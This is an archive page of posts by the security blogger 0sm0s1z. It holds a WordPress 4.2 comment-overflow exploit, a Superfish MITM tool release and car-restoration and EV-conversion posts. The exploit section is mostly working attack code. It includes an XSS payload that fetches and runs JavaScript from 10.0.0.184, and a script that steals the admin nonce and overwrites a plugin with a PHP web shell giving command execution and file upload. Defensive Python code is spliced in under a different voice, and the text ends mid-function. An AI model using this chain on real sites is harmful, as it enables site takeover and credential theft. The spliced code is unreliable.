Author Archives: 0sm0s1z

About 0sm0s1z

Matthew Toussain (0sm0s1z) is a computer security professional. When not actively defending the nation’s networks from rampaging cyber pandas, he can be found tinkering with hacking tools or speaking at any conference where he can find an audience. Between coding Subterfuge and developing/commanding the U.S. Air Force Academy’s Basic Cyber Competency Course, which now trains over 400 students per year, it would be a wonder if he had time for anything less nerdy in his life. Since he doesn’t, he spends the remainder of his time participating in national and international cyber competitions such as iCTF, CSAW, CCDC, and SANS NetWars. Matthew was a guest speaker at the 20th anniversary of DEFCON, the largest security conference in the world, and a member of the only undergraduate team ever to become the overall winners of the NSA’s Cyber Defense Exercise, defeating all contenders including the Air Force Institute of Technology. He lives in Biloxi, MS with a multitude of Cisco switches. His secondary passions include the piano, guitar, violin, and running. He has yet to figure out a way to mesh them together, but when he does it’s gonna be big.

WordPress 4.2 Comment Field Overflow Exploit

While far from unique, the recent vulnerability in the WordPress 4.2 comment system is exceptionally egregious. The vast majority of WordPress attacks affect user-installed plugins. Though these plugins often receive wide usage, exploitation of their vulnerabilities is limited to those users who individually added the plugin to their site. This vulnerability, by contrast, comes packaged with the default WordPress build.

What’s the big deal?

WordPress is the most popular blogging system in the world, and is used by over 60 million websites. The WordPress Content Management System (CMS) is so popular that it often sees usage on more than just blogs, yes, even e-commerce sites. 23.3% of the top 10 million websites run WordPress, and unless these sites disabled the default comment system or installed an alternate comment plugin, they are ALL vulnerable.

WordPress released an emergency patch for this vulnerability. If automatic updates are enabled, the patch is pushed with 4.1.4. Alternately, upgrading WordPress to version 4.2.2 resolves this issue.

Comment Field Overflow Vulnerability

The vulnerability was discovered by Jouko Pynnonen and exploits a stored Cross Site Scripting (XSS) flaw. Affected software packages:

  • WordPress 4.2
  • WordPress 4.1.2
  • WordPress 4.1.1
  • WordPress 3.9.3

The bug itself is a result of a MySQL database limitation for very long posts. When WordPress stores the content of these very long comments in the database, MySQL truncates the value. This means that the closing parts of an HTML element like <a title='…'> (the closing quote and tag) are lost when the comment is loaded into the database.

Contents of the MySQL database once the comment has been truncated and inserted

Theoretically, the truncation would break the tag, rendering the XSS invalid, so WordPress does not filter the content. In practice, however, while WordPress certainly fails to filter the dangerous content, the user’s browser is much more helpful.

Because HTML is such a versatile language, adherence to best-practice syntax is not… universal. As a result, browsers attempt to automatically fix issues like broken tags. The browser (tested in Chrome and Firefox) will add in an enclosing </a> tag, as seen in the source code shot pictured.

And that gentlemen, is code execution. Now for the fun part, getting a shell!

Proof of Concept Alert

The proof of concept exploit below can be used to determine whether a site is vulnerable.

<a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px  AAAAA [64KB More As] AAA'></a>

Executing Arbitrary Javascript

In order to fully leverage this attack we need to gain the ability to execute arbitrary JavaScript. This can be accomplished by hosting an external .js source file and using eval() embedded in an onmouseover event against the target. See below:

<a title='xxx onmouseover=eval(unescape(/var%20a%3Ddocument.createElement%28%27script%27%29%3Ba.setAttribute%28%27src%27%2C%27http%3A%2f%2f10.0.0.184%2fexploit.js%27%29%3Bdocument.head.appendChild%28a%29/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px  AAAAA [64KB More As] AAA'></a>

Escalating To Shell Access in WordPress

Now that we have the ability to execute arbitrary remote JavaScript on the target, we need to come up with a snazzy way to use it! In WordPress an Administrator can use the built-in plugin editor to modify installed plugins. This effectively means there is a page on the site that takes POST requests containing PHP code!!!! Hint: the page is called plugin-editor.php

Using XMLHttpRequest we can make POST and GET requests from JavaScript. We first make a GET request to a random admin page to obtain an admin nonce (CSRF token). The next step is to pull the token out of the HTTP response data and replay it to the plugin editor along with our payload. In this case I URL-encoded my personal PHP shell (because I know the code and like it better than c99 and others). You are welcome to use it if you want; use the URL decoder here and the source below if interested. Alternately, you could just URL-encode a PHP meterpreter and browse to the location whenever you are in need of a session.

Note: This attack overwrites one of the WordPress default plugins. I like to use akismet/akismet.php because it is installed by default and performs a useful function (as opposed to the Hello Dolly plugin, which I typically delete on my personal WordPress installs).

// Synchronous GET; returns the response body so the nonce can be parsed out of it
function get(url)
{
    var http = new XMLHttpRequest();
    http.open( "GET", url, false );
    http.send( null );
    return http.responseText;
}


// Synchronous POST to the plugin editor; the body carries the nonce and the URL-encoded plugin contents
function post(url, csrftoken)
{
    var http = new XMLHttpRequest();
    http.open( "POST", url, false );
    http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
    http.send("_wpnonce=" + csrftoken + "&_wp_http_referer=/wp-admin/plugin-editor.php?file=hello.php&plugin=hello.php&newcontent=78%3C%21-----------------------------------------------------------------%0A%09%09%090sm0s1z%0A%0AThe+Purpose+of+this+file+is+to+act+as+a+Remote+File+Inclusion+vector+to+exploit+a+web+page+through+a+Persisten+Vulnerability.%0A------------------------------------------------------------------%3E%0A%0A%3Chtml%3E%0A%3Ctitle%3EH4X0R3D%3C%2Ftitle%3E%0A%3Chead%3E%0A%0A%3C%21------------------------------%0Awanna+put+some+javascript+here%3F%0A-------------------------------%3E%0A%0A%3C%2Fhead%3E%0A%0A%3Cbody%3E%0A%0A%3C%21---------------------------------------------%0APHP+Terminal%0A----------------------------------------------%3E%0A%0A%3Ch3%3ETerminal%3A%3C%2Fh3%3E%0A%0A%0A%3Cform+method%3D%22post%22+action%3D%22%3C%3Fphp+echo+%24_SERVER%5B%27PHP_SELF%27%5D%3B%3F%3E%22%3E%0A0sm0s1z%3E%3Cinput+type+%3D+%22text%22+name+%3D+%22cmd%22+%2F%3E%0A%3C%2Fform%3E%0A%0A%3C%3Fphp%0Aif%28isset%28%24_POST%5B%27cmd%27%5D%29%29%0A%7B%0A%0A%0A%0Aecho+%27%3Cpre%3E%27%3B%0A%0A%24cmd+%3D+%24_POST%5B%27cmd%27%5D%3B%0A%0A%24last_line+%3D+system%28%24cmd%2C+%24retval%29%3B%0A%0A%2F%2F+Printing+additional+info%0Aecho+%27%0A%3C%2Fpre%3E%0A%3Chr+%2F%3ELast+line+of+the+output%3A+%27+.+%24last_line+.+%27%0A%3Chr+%2F%3EReturn+value%3A+%27+.+%24retval%3B%0Aecho+%27%3Chr+%2F%3E%27%3B%0A%0A%0A%7D%0A%3F%3E%0A%0A%0A%3C%21---------------------------------------------%0APHP+File+Upload+With+Directory+Selection%0A----------------------------------------------%3E%0A%0A%3Ch3%3EFile+Upload%3A%3C%2Fh3%3E%0A%0A%3Cform+enctype%3D%22multipart%2Fform-data%22+action%3D%22%3C%3Fphp+echo+%24_SERVER%5B%27PHP_SELF%27%5D%3B%3F%3E%22+method%3D%22POST%22%3E%0A%3Cinput+type%3D%22hidden%22+name%3D%22up%22+%2F%3E%0AChoose+a+file+to+upload%3A+%3Cinput+name%3D%22uploadedfile%22+type%3D%22file%22+%2F%3E%3Cbr+%2F%3E%0AFile+Path%3A%3Cinput+type+%3D+%22text%22+name+%3D+%22path%22+%2F%3E%3Cbr+%2F%3E%0A%3
Cinput+type%3D%22submit%22+value%3D%22Upload+File%22+%2F%3E%0A%3C%2Fform%3E%0A%0A%3C%3Fphp%0Aif%28isset%28%24_POST%5B%27path%27%5D%29%29%0A%7B%0A%0A%0A%24target_path+%3D+%22%22%3B%0A%0A%24target_path+%3D+%24_POST%5B%27path%27%5D%3B%0A%0A%24target_path+%3D+%24target_path+.+basename%28+%24_FILES%5B%27uploadedfile%27%5D%5B%27name%27%5D%29%3B+%0A%0Aif%28move_uploaded_file%28%24_FILES%5B%27uploadedfile%27%5D%5B%27tmp_name%27%5D%2C+%24target_path%29%29+%7B%0A++++echo+%22The+file+%22.++basename%28+%24_FILES%5B%27uploadedfile%27%5D%5B%27name%27%5D%29.+%0A++++%22+has+been+uploaded%22%3B%0A%7D+else%7B%0A++++echo+%22There+was+an+error+uploading+the+file%2C+please+try+again%21%22%3B%0A%7D%0A%0A%0A%0A%7D%0A%3F%3E%0A%0A%0A%0A%3C%21---------------------------------------------%0AVulnerability+Test+Box%0A----------------------------------------------%3E%0A%0A%3Ch3%3ETest+Vectors+Here%3A%3C%2Fh3%3E%0A%0A%3Cform+enctype%3D%22multipart%2Fform-data%22+action%3D%22%3C%3Fphp+echo+%24_SERVER%5B%27PHP_SELF%27%5D%3B%3F%3E%22+method%3D%22POST%22%3E%0A%3Cinput+type+%3D+%22text%22+name+%3D+%22test%22+%2F%3E%0A%3C%2Fform%3E%0A%3C%3Fphp%0Aif%28isset%28%24_POST%5B%27test%27%5D%29%29%0A%7B%0A%0A%24test+%3D+%24_POST%5B%27test%27%5D%3B%0A%0Aecho+%24test%3B%0A%0A%7D%0A%3F%3E%0A%0A%0A%0A%0A%0A%0A%3C%21---------------------------------------------%0AInclusion%0A----------------------------------------------%3E%0A%0A%0A%3Chr+%2F%3E%0A%3Cpre%3E%0Ainject%3A%09++%09+include%28%27mysite.php%27%29%3B+%3Cbr%3E%0ATo+exploit+Remote+File+Inclusion+Vulnerability%0A%3C%2Fpre%3E%0A%3Chr+%2F%3E%0A&action=update&file=hello.php&plugin=hello.php&scrollto=0&submit=Update+File");
    return http.responseText;

}

// Load an admin page that embeds the current _wpnonce value
var page = get("/wp-admin/plugin-editor.php?file=akismet%2Fakismet.php&plugin=akismet%2Fakismet.php");

// [^)]+ is over-broad (it runs past the closing quote); slice(0, 10) keeps only the 10-character nonce
var regExp = /name=\"_wpnonce\"\svalue=\"([^)]+)\"/;
var matches = regExp.exec(page);
var csrftoken = matches[1].slice(0, 10);

post("/wp-admin/plugin-editor.php", csrftoken);

The WordPress 4.2 Comment Exploit

I wrote a Metasploit module to trigger this vulnerability:

https://github.com/0sm0s1z/WordPress-Comment-Overflow

The Patch

WordPress patched this flaw by disabling long comments…. Well Done….
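To make the root cause and the patch’s approach concrete, here is an added Python example (my own, not code from this post or from WordPress) that models the lossy insert described in the Comment Field Overflow section, shows the size check that refusing long comments amounts to, and scans already-stored rows for the tell-tale shape: a comment sitting exactly at the column limit whose last tag never closes and carries an event-handler attribute. The sample comment, the row list and the 200-byte demo limit are constructed for the demonstration; the 65535-byte figure is the capacity of a MySQL TEXT column.

```python
import re

# A MySQL TEXT column holds at most 65535 bytes; in non-strict mode a longer
# value is silently cut at that size, which is the truncation the post blames.
MYSQL_TEXT_LIMIT = 65535

# Attribute names a browser would run once the lost quote lets it read them as
# separate attributes (the post's PoC uses onmouseover).
EVENT_HANDLER_RE = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)


def store_in_text_column(comment, limit=MYSQL_TEXT_LIMIT):
    """Model the lossy INSERT: keep the first `limit` bytes and drop the rest."""
    data = comment.encode("utf-8")
    return data[:limit].decode("utf-8", errors="ignore")


def fits_in_column(comment, limit=MYSQL_TEXT_LIMIT):
    """The fix in one line: reject the comment rather than let the database shorten it."""
    return len(comment.encode("utf-8")) <= limit


def dangling_tag(text):
    """Return the text from the last tag start ('<' + letter) that is never closed by '>', else None."""
    start = text.rfind("<")
    if start == -1 or not re.match(r"<[A-Za-z]", text[start:]):
        return None  # no tag start at all, or something like "I <3 this" which is not a tag
    if ">" in text[start:]:
        return None  # the tag was closed, nothing was cut off
    return text[start:]


def scan_stored_comments(rows, limit=MYSQL_TEXT_LIMIT):
    """Flag (comment_id, content) rows that look truncated mid-tag; returns (id, reasons) pairs."""
    findings = []
    for comment_id, content in rows:
        tail = dangling_tag(content)
        if tail is None:
            continue
        reasons = ["unterminated tag"]
        if len(content.encode("utf-8")) == limit:
            reasons.append("content exactly at column limit")
        handlers = sorted({h.rstrip("= \t").lower() for h in EVENT_HANDLER_RE.findall(tail)})
        if handlers:
            reasons.append("event handler inside unterminated tag: " + ", ".join(handlers))
        findings.append((comment_id, reasons))
    return findings


def build_oversized_comment(padding):
    """Constructed sample in the shape the post describes: the closing quote and
    tag sit after a long run of padding so that truncation removes them."""
    return ("<a title='x onmouseover=alert(1) style=position:absolute "
            + "A" * padding + "'></a>")


if __name__ == "__main__":
    limit = 200  # small stand-in for the 65535-byte TEXT column so the demo stays readable
    comment = build_oversized_comment(padding=400)
    print("accepted by size check:", fits_in_column(comment, limit))
    stored = store_in_text_column(comment, limit)
    rows = [(1, stored), (2, "I <3 this post"), (3, "<a href='x'>ok</a>")]  # constructed rows
    for comment_id, reasons in scan_stored_comments(rows, limit):
        print("comment", comment_id, "->", "; ".join(reasons))
```

Running the file directly prints the verdicts for the constructed rows; to audit an existing site, feed scan_stored_comments the id and comment_content pairs from wp_comments with the real column limit. Separately from the comment filter, the escalation path in this post relies on the admin plugin editor being reachable; WordPress lets you switch that editor off with define('DISALLOW_FILE_EDIT', true) in wp-config.php.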

Conclusion

Hopefully this post was an interesting read! If you have any thoughts on the WordPress 4.2 Comment Exploit, my Metasploit module, or a suggestion/topic you’d like covered let me know in the comments below. FYI I use Disqus, sorry :)

Further Reading:

[1] https://blog.sucuri.net/2015/04/critical-persistent-xss-0day-in-wordpress.html
[2] http://arstechnica.com/security/2015/04/just-released-wordpress-0day-makes-it-easy-to-hijack-millions-of-websites/
[3] http://thehackernews.com/2015/04/WordPress-vulnerability.html
[4] http://klikki.fi/adv/wordpress2.html
[5] https://core.trac.wordpress.org/changeset/32311/branches/4.2/src/wp-admin/includes/upgrade.php

Exploiting Superfish with Subterfuge

Let’s talk about the Internet. What do you use it for? Banking, social networking, private email, registering your car, maybe even your taxes? When you’re using the web to accomplish these somewhat standard tasks you are almost invariably predicating the security of your interactions on HTTPS. Here’s the funny thing about HTTPS though: it requires TRUST.

Typically, that trust is vested in a verified third-party like Comodo Inc. Now while this third party may or may not be trustworthy, at least you can be confident that all of your eggs are NOT in the same basket right? RIGHT!?

Unfortunately, if you are the recent owner of a Lenovo computer not only are all of your eggs in the frying pan, but anyone can reach over and dump them into the fire at will! How did this happen?

Using the Superfish Root CA

The integrity of HTTPS communications is seated in the certification authority trust model. In order to inject “targeted ads” into your browsing experience Lenovo had to break the foundation of that security model. Superfish, their solution to this quandary, functions by adding a root certificate authority to your computer. It then spies on your encrypted Internet traffic… not cool!

What’s worse, as an attacker you can retrieve Superfish’s certificate! That means that I can spy TOO! Robert Graham did an outstanding writeup on the steps he took to retrieve the certificate: http://blog.erratasec.com/2015/02/exploiting-superfish-certificate.html

I further removed the certificate passphrase and added it into Subterfuge in order to demonstrate just how trivial it is to exploit this vulnerability. Click the start button… wait for bank creds… really, Lenovo? This kind of perversion of their customers’ trust isn’t simply bad business, it’s unethical.

Subterfuge 1.0.1

In order to facilitate attacks on Superfish we just released an exceptionally raw update to Subterfuge. In this update the toolkit moves away from SSLStrip-based proxying of web traffic to MITMProxy-based handling. So… what exactly does that mean?

1. Subterfuge can now MITM SSL sessions using arbitrary certificates

2. SSLStripping can be selectively enabled or disabled as desired

Installation

This package is an update to existing Subterfuge installations, not a stand-alone version.

To download the Subterfuge version 1.0 installer click here. (This version of Subterfuge does NOT include Superfish attack support).

To download the version 1.0.1 update package click here.

Version 1.0.1 now requires MITMProxy. To install MITMProxy on Kali Linux (or other Debian-based Linux variants) run:

sudo -s
wget https://bootstrap.pypa.io/get-pip.py
python get-pip.py
apt-get install build-essential python-dev libffi-dev libssl-dev libxml2-dev libxslt1-dev
pip install mitmproxy

Upgrading Subterfuge

This requires that Subterfuge version 1.0 already be installed on the system; for instructions on accomplishing this see: http://kinozoa.com/blog/installing-subterfuge-on-kali-linux/

Uncompress the latest version of Subterfuge into your existing installation directory as shown below:

tar -xvf subterfuge_1.0.1.tar.gz -C /usr/share/

Configuring Subterfuge to SSL Intercept

Settings Page

  1. Set Proxy Mode: MITMProxy
  2. Apply

Executing the Attack

At this point attacking with Subterfuge commences as usual. Please note that this is a bleeding edge release of the framework and has not been tested to ANY degree. That means it is likely to be buggy, or not produce expected results consistently. Please use the comments below to describe any issues you are having, and we’ll do our best to get them fixed up and packaged into a more official release… (2.0 fingers crossed).

References

MITMProxy: https://mitmproxy.org/doc/index.html

Slate: http://www.slate.com/articles/technology/bitwise/2015/02/lenovo_superfish_scandal_why_it_s_one_of_the_worst_consumer_computing_screw.html

Repairing Rust Damage with Fiberglass

My ride originally comes from Pennsylvania. As a result it has an ATROCIOUS rust problem. Fortunately, it doesn’t look like any of the rust directly impacts the structural integrity of the vehicle. After removing my hood and fenders I was able to see the full extent of the damage. I decided to fix the damage by bonding fiberglass directly to the vehicle unibody.

Tools Used:

  • Hammer
  • Flathead screwdriver
  • Metal Snips
  • Orbital Sander
  • Super cheap paintbrushes (They turn into plastic after you’re done)
  • Latex Gloves
  • Respirator

Materials:

Liberal application of a hammer, flathead screwdriver, metal snips, and my orbital sander gave me a good look at what exactly needed repairing.

The most significant damage was under my driver’s side fender. I had to remove a fair amount of metal in order to eliminate all of the rust spots.

Other damaged areas included the engine compartment frame that my fenders were bolted to and the floor on the driver’s side. And yes, I could stick my hand right through the bottom of my car and touch the road!

There was also some corrosion damage around the battery compartment that needed patching.

Patch Management

The first step was to prep the regions. Affixing my handy dandy respirator, I mixed fiberglass resin with MEKP (catalyst) in order to start the clock. The resin is very sticky, but starts to harden within 3-5 minutes. I coated the problem areas liberally. By the time I’d gotten through coating all of the areas, the places I started at had already gotten tacky.

Tacky – Fiberglass resin is said to have gone “tacky” once it is no longer wet and gloppy like an oil-based paint, and is holding its position. At this point the resin is very sticky (like glue). Once it has dried and is no longer sticky, it ceases to be “tacky”.

Once the resin became tacky I added my first layer of 6 oz fiberglass cloth. You can technically add resin to any type of cloth in order to form a solid part. The most common materials are:

Fleece/Cotton/Other Crap – Fleece and cotton are common base materials used in DIY composite construction due to their high availability and low price, but they lack the strength of more advanced fabrics.

Carbon Fiber – Carbon fiber is super cool, super light, super strong, and super expensive. It is also relatively hard to come by when compared to other fabrics, but it looks sick!

Kevlar – Kevlar is very strong, but it is also extremely heavy when compared to other fabrics.

Fiberglass – Fiberglass comes in two general flavors: fiberglass mat and fiberglass cloth.

Fiberglass Mat vs Cloth – The general difference is price and finish. Mat has a much coarser grain and is often used in the construction of temporary parts like molds for future fiberglass work. Cloth is more expensive, but it has a denser weave and can be more easily sanded to a pristine finish. Since fiberglass is not overly expensive I chose to use it as my learning material (as opposed to expensive carbon fiber). I’m using 6 oz fabric (fiberglass fabric is differentiated by the weight, in oz, of the material).

The next step was to coat the fiberglass with another layer of resin in order to set it appropriately.


Depending on the location I laid down between 3 and 4 layers of fiberglass.

Sanding


Before applying paint I sanded the patches smooth.

Finishing Touches

Finally, I added a layer of paint and let the sucker dry!

I’m really happy with how these repairs turned out. The fiberglass is extremely strong (I tested it with my hammer).

In making these repairs minimal weight was added to the vehicle. I didn’t have to purchase expensive welding equipment. The project only took a couple days despite my lack of experience with this type of work.

Let me know what you think or if I left out some obviously crucial detail that you’d like to be regaled with. Yanking the engine out was a load of fun!

Engine Compartment Cleaning

This took a LOT of scrubbing! Followed by painting. Rust was a very significant concern so I spent a lot of time sanding the sucker down and then repainting in order to mitigate long term wear and tear as much as possible.

Tools used:

Rust-Oleum 7582838 Professional Primer Spray Paint, Gray Primer, 15-Ounce

Rust-Oleum 239107 Professional Spray Paint, Semi-Gloss Black, 15-Ounce

After scrubbing I put down a couple coats of primer.

Next a couple coats of paint, and she cleaned up nice!

Trippin’ on Dat ICE

It’s time to ditch my greasy old Internal Combustion Engine (ICE)! My Mustang II is currently running a 1976 2.3L v4 carbureted hunk of scrap metal. That’s not to say I’ve got anything against a carb, having that over fuel injection would certainly have solved some of the recent trouble I’ve had with my other car, but… a v4? In a Mustang? Nope, goin ‘lectric!

I bought an Impact Tool to help me pop the nuts off of the rig, but I found that most of the time I only had the room to use a plain old wrench. Getting this hunk of junk was a total pain that included me standing on the engine itself and trying to deadlift some of the bolts loose. Slippage? Let’s just say that I have about a hundred bruises.

Lesson learned during this sprint: ??? Wrenches suck…

Tools used:

  • Ingersoll Rand 236G 1/2-Inch Edge Series Air Impactool, Silver
    • English Driver Set (Stanley)
    • Metric Driver Set (Stanley)
    • Impact Joint Set
  • Wrench Set
  • Ratchet Set 12mm – 23mm (needed english set not metric, old Fords…)
  • Couple Buckets
  • Car Jack
  • 2 Jack Stands
  • Cherry Picker/Engine Hoist
  • Air Cutoff Tool (had to cut through some of the bolts on my exhaust piping, was epic fun!)

The motor before I started turning wrenches

Started by jacking the vehicle up. I was afraid of the jack stand’s stability for a while, but after jumping on the engine block for hours on end I managed to develop a modicum of bravery. It certainly looks precarious though. Ya, I was under that!

Hours of tugging on wrenches, draining oil, and smashing things with my hammer out of frustration (not on the parts list) later…

Lift!

I wrapped trucker chains around the motor in order to get it out. Unfortunately I stripped the heck out of the bolts on the exhaust system so I couldn’t disconnect it. You can see it hanging off in the picture below. In order to rectify that I had to cut the bolts tying it together underneath the car. That allowed me to raise the motor as high as seen in the photo, but the exhaust pipe was still too long to go any further. Fortunately, getting the engine out this far allowed me to get a better angle on the nut and my air impact tool was able to spin it right off. That sucker was money very well spent. Glad I went with the higher-end IR. It was on sale on Amazon too, $77 bucks! At the time of this posting it was back up to $100 with MSRP at $130, so definitely happy with my timing.

Exhaust Trouble

Finally loose!

Motor out and engine compartment cleaned up a bit.

This next part of the project is actually for the next phase (installation of the electric motor), but it shows the engine bay cleaned up and painted so I figured I’d throw it in. Anyway! Let me know what you think or if I left out some obviously crucial detail that you’d like to be regaled with. Yanking the engine out was a load of fun!

Mustang Project – Week 1

Much tinkering was done. This week I placed an order for an [Ingersoll Rand impact drill and the associated hardware]. While waiting for that, I began work on the vehicle body. I started fabricating the front bumper (note I’m building the chin spoiler separately). I completed the bumper’s shell and should only have to reinforce/layer the part in order to get it into working shape. I also removed the radiator and began shaping the hood.

Lesson learned this week: fiberglass burns! Don’t dump it on yourself (it also turns your jeans into plastic).

Tools used this week:

  • Dewalt Power Drill
  • Orbital Sander
  • Fiberglass Kit
    • Respirator
    • Fiberglass cloth (6oz)
    • Bondo Resin
    • Cheap Brushes
    • Fiberglass Roller
    • Latex Gloves
  • Molding Clay (terra cotta)
  • Insulation (blue) foam
  • Various Screws

The Endeavor

Fiberglass’d

I began by ripping the bumper off with a ratchet. I think it’s safe to discard. It looks bad, is heavy, and I’m not sure it’s structurally necessary. The front pegs it was attached to are still there providing support. Furthermore, once I remove the engine, the engine compartment won’t need as much protection… I think. Anyway it will look cool!

Next I began work on the replacement bumper. Originally, I wanted to build the whole thing out of clay to form the mold, but that turned out to be prohibitively heavy. The bumper came apart under its own weight, dang gravity!

For my next attempt I purchased [insulation foam] from Lowes. I used this with my [power drill] and some hardware to build the shape. I then sanded it down to allow the clay to better grip the surface. Finally, I covered the thing in clay to form the final shape.

I now covered the thing in aluminum foil, waxed the foil with a mold release, and applied resin. Next I chopped up the fiberglass cloth and began layering it. I waited for the first layer to be about halfway dry before adding the second, and I applied additional resin after each layer. I only layered it twice for now to give the piece a semi-rigid form but will add additional layers to get the part to where I want it.

The final step will be to sand it until happy. I’m also not sure what it will look like until after I add the chin spoiler so I intend to fabricate that before going much deeper into the weeds on the bumper itself.

Other Work

I ripped out the radiator.

And I began working on the hood mold.

Alright! That’s all for this week. Next week I should be receiving my air drill, and I intend to buy an engine hoist. The plan is to finish the hood, drain the engine, and get the engine out! Lots of work gotta get ‘er done!

Mustang II Conversion – The Body

In this second post about my 1976 Mustang II project I’m going to discuss the vehicle’s body, and the modifications I either have to or want to make to it. Most people hate it, but the 70s Mustangs are my favorite in the long line of pony cars. Whilst trolling the Internet for sexy hot rods, I stumbled upon this saliva inducing beauty put together by the folks at A-Team Racing. I’m using that vehicle as the reference and target for my own project. Note that not only do I have absolutely NO experience working on cars or with composites, but I also do expect to spend most of my time stepping on my tail and failing. Best way to learn right? At least I’m realistic…

Conversion

Rough Design

The vehicle I’m starting with has some significant bodily differences from my target so I did a quick mockup of what the vehicle should look like before and after. This allowed me to really get a feel for how large the project I’m taking on actually is. It’s pretty big…

Sorry, the bottom image didn’t scan well. I’ll try to spruce it up in the future.

You’ll notice that the biggest issue is that hatchback problem. My donor vehicle is a notchback, not cool. The part that I’m most worried about there is the glass. I intend to fabricate the rear panel out of fiberglass and use a lexan sheet for the window. I think I can drill holes through these layers and bolt them together, then grind off the bolts and fiberglass over top of them to get a smooth finish.

Fabrication Plan

The basic idea is to pull off most of the body panels and replace them with fiberglass replicas. This allows me to cut weight while also giving me the opportunity to adjust the vehicle’s appearance to better suit my ego.

Here’s the general layout of my plan:

  • I will be using foam to build the general shape of the body panels
  • I plan to overlay that with clay in order to mold a more defined shape
  • Next I will cover that with aluminum foil and spray it with a releasing solution
  • Then I plaster fiberglass on top of that and let it harden into the part
  • After reinforcing the piece I should be done

In some cases I may have to take the positive and pull a negative form off to get the actual desired shape, but that is generally speaking what the process should be to build virtually every part of the car… I hope…

Let me know where the wrinkle is in my plan! No, it’s not the whole plan, Jeez!

Mustang II Restoration & Conversion

I’m beginning a new project and this one is a touch out of the ordinary for me. I know absolutely nothing about cars, but I’m going to be taking an old 1976 Ford Mustang II, modernizing it, restoring it, and converting it to electric power or die trying.

My first objective is to establish the technical requirements for my project. The purpose of this vehicle, once built, is going to be taking me to and from work on a daily basis; however, I would like to maximize the vehicle’s acceleration where possible in order to yield a more pleasurable driving experience.

Dialing in the Project Requirements

My daily commute is 16 miles each way. I want to have at least a 30% mileage buffer but would prefer a 50-60% buffer due to additional battery drain caused by auxiliary systems like HVAC, the stereo, power steering, etc. This all totals out to:

Range Calculation:

[image: range calculation]

This means my minimum range is 42 miles, and my target range is between 48 and 52 miles. The next step is to determine how much power it will take to drive my car each mile. This metric is known as watt-hours per mile, or Wh/mi. This number can be extremely difficult to determine prior to producing the finished product. It is further muddled by the driving efficiency over speed curve. That is to say, my base requirement is a function of the vehicle’s weight and aerodynamics, but my electric motor will also have a different efficiency based on the speed I am traveling at and the gear ratio of the vehicle’s transmission/rear axle. This means that I have to begin making assumptions and over-engineering my system in order to develop an adequate product.

The most important controllable variable in this equation is the vehicle’s weight. 1973-1978 Ford Mustangs had a gross curb weight of anywhere between 2600 and 3400lbs based on the year model and trim package. By ditching the major vehicle components required for an internal combustion engine (ICE), we shed a bunch of the car’s flab. My donor car is a 1976 notchback body style 2.3L v4. This makes it a muscle car wussy! Fortunately for me, it also makes it one of the lighter Mustang IIs weighing in at 2600lbs. The vehicle also suffers from some rust and is in need of a facelift so I will be constructing my own paneling out of fiberglass and carbon fiber. These modifications should allow me to shed additional weight over the existing sheet metal.

Component        Weight (lbs)
Engine           400
Exhaust System   200
Fuel Tank        50
Sheet Metal      150
Total            800 lbs
New Weight       1800 lbs

This is of course just the vehicle’s weight without the new electric drivetrain and batteries to propel it forward. Once I factor those pieces in the car will be much heavier, though still lighter than it was as a stock ICE. Since we won’t know how much battery we need until we solve for Wh/mi, and we need to know vehicle performance data in order to calculate that, we will make some assumptions. Wh/mi for most light vehicles tends to be around 250-300 and for small trucks it is 350-400. I was able to find that the amp draw for a small Miata is 90 amps at 50 mph. We will use this number as our low end. For our high end, since the Mustang II will be much heavier, we will assume 170 amps at 70 mph. For all of these calculations we will assume a 144V battery system, though our final setup might differ. We’re just eyeballing and overestimating here.

Range Calculation:

[image: Wh/mi calculation]

The last thing we need to do is solve for our power requirements. In order to preserve the lifespan of our batteries we must factor in a depth of discharge (DoD) limit. If we deplete our cells by more than 80% it will greatly shorten the life expectancy of the EV. This means that we will need an additional 20% on top of our power requirements. For this conversion I will be using lithium ion batteries (LiFePO4). However, if using lead acid batteries it is important to also factor in the Peukert effect. This effect causes lead acid to output at only 55% efficiency, meaning that we need almost twice as much power for the same effect. All right! Power is in watts, so let’s solve for it!

Power Requirements:

[screenshot: power requirement worksheet]

Value                        Power Requirement (W)   DoD Factored (x1.2, W)
Minimum Power @ 50mph        10811.84                12974.208
Base Target Power @ 50mph    12475.2                 14970.24
Top Target Power @ 50mph     13306.88                15968.256
Minimum Power @ 70mph        16219.84                19463.808
Base Target Power @ 70mph    18715.2                 22458.24
Top Target Power @ 70mph     19962.88                23955.456

That puts peak power for my rig at about 24 kW (24,000 W). Now it’s time to take a look at equipment and gauge the kind of power I am going to see.
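The arithmetic above, carried through as an added example (my code, not the author’s spreadsheet, which survives only as the screenshots). It uses the post’s own inputs: a 144 V pack, 90 A at 50 mph and 170 A at 70 mph, an 80% DoD ceiling, and the 3.2 V / 100 Ah cells from the parts list further down. The Peukert exponent of 1.2 and the 20-hour capacity rating are my assumptions, typical textbook lead-acid values. It goes one step past the post by showing the general Peukert formula and a pack-for-range sizing, and it sizes by dividing by 0.8 rather than applying the post’s flat 20% uplift.

```python
"""Pack sizing worked through with the post's numbers (added example, not the
author's spreadsheet). Inputs marked 'post' come from the text; everything
else is an assumption of this example."""
import math

PACK_V = 144.0                      # post: assumed 144 V system
MAX_DOD = 0.80                      # post: never drain the cells past 80%
DRAW_AMPS = {50: 90.0, 70: 170.0}   # post: Miata-class low end, heavier high end
CELL_V, CELL_AH = 3.2, 100.0        # post's parts list: 3.2 V / 100 Ah cells
PEUKERT_K_PB = 1.2                  # assumption: typical flooded lead-acid exponent
RATED_HOURS = 20.0                  # assumption: capacity quoted at the 20-hour rate


def power_w(volts, amps):
    """Electrical power at steady cruise, P = V * I, in watts."""
    return volts * amps


def wh_per_mile(volts, amps, mph):
    """Watts divided by miles-per-hour gives watt-hours per mile at that speed."""
    return power_w(volts, amps) / mph


def rated_for_requirement(required, max_dod=MAX_DOD):
    """Scale a requirement (W or Wh) so it fits inside the DoD window.
    Dividing by 0.8 is a 25% uplift; the post's table applies a flat 20% (x1.2)."""
    return required / max_dod


def range_miles(volts, amp_hours, whpm, max_dod=MAX_DOD):
    """Usable energy (V * Ah * DoD) divided by energy per mile."""
    return volts * amp_hours * max_dod / whpm


def pack_wh_for_range(target_miles, whpm, max_dod=MAX_DOD):
    """Nominal pack energy needed to cover target_miles without exceeding the DoD."""
    return rated_for_requirement(target_miles * whpm, max_dod)


def cells_in_series(pack_v, cell_v=CELL_V):
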